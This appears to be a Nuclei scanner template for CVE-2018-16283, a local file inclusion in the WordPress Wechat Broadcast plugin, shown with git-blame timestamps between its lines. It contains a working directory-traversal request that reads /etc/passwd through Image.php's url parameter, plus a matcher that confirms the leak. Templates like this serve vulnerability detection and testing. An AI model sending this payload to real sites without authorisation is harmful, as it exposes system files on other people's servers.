2021-07-19 12:47:31 +00:00
|
|
|
id: CVE-2018-16283
|
2021-05-27 03:15:53 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
|
|
|
|
author: 0x240x23elu
|
2021-07-19 12:52:19 +00:00
|
|
|
severity: critical
|
2022-04-29 19:58:07 +00:00
|
|
|
description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://www.exploit-db.com/exploits/45438
|
2022-04-29 19:58:07 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/springjk/wordpress-wechat-broadcast/issues/14
|
|
|
|
- http://seclists.org/fulldisclosure/2018/Sep/32
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2018-16283
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-05-27 03:15:53 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-05-27 03:15:53 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-07-19 12:47:31 +00:00
|
|
|
part: body
|
2022-04-29 19:58:07 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/04/26
|